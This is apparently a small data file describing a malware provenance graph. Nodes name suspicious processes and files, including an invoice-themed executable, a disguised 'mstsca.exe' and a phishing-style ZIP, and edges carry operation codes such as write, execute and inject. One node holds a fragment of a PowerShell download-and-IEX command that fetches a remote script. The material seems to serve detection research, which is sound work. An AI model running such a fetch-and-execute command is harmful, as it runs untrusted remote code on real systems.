13
MP*-nsA0C0.tmp 
SF-C:\Users\admin\AppData\Roaming\Microsoft\Network\mstsca.exe
MP-Invoice.exe 
MF-C:\Windows\System32\sdiagnhost.exe
TP-hh.exe 
MF-\Users\admin\AppData\Local\Temp\trebovanie-ck-ot-07.08.23-parol-12312312.zip
SF-C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\MyDellService\MyDellService.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX
SF-C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\WinRAR.exe
MP*-NOTEPAD.EXE
MF-C:\Program files\appdata\local\temp\17634.bmp
MP*-Notepad Soft.exe 
MP*-legosa.exe 
34
0 1 WR-1
0 2 FR-1
2 1 EX-1
0 3 WR-1
2 3 RD-1
0 4 IJ-1
4 1 EX-1
2 4 UK-1
0 5 RD-1
0 6 WR-1
7 0 RF-1
0 8 WR-1
0 9 FR-1
9 1 WR-2
9 3 WR-2
9 5 WR-2
9 6 WR-2
9 7 ST-2
9 8 WR-2
0 10 WR-1
9 10 RD-2
11 3 RD-3
11 5 RD-3
11 6 WR-3
11 7 ST-3
11 8 EX-3
11 10 WR-3
12 3 WR-4
12 5 RD-4
12 6 WR-4
12 7 ST-4
12 8 WR-4
12 10 RD-4
11 12 UK-3

